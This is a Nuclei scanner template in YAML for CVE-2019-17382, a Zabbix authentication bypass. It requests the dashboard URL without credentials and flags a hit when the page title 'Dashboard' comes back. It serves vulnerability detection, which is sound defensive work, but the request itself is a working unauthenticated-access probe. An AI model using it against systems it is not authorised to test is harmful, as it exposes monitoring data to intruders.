nuclei-templates/cves/2019/CVE-2019-17382.yaml

23 lines
470 B
YAML

id: CVE-2019-17382
info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
tags: cve,cve2019,zabbix
requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"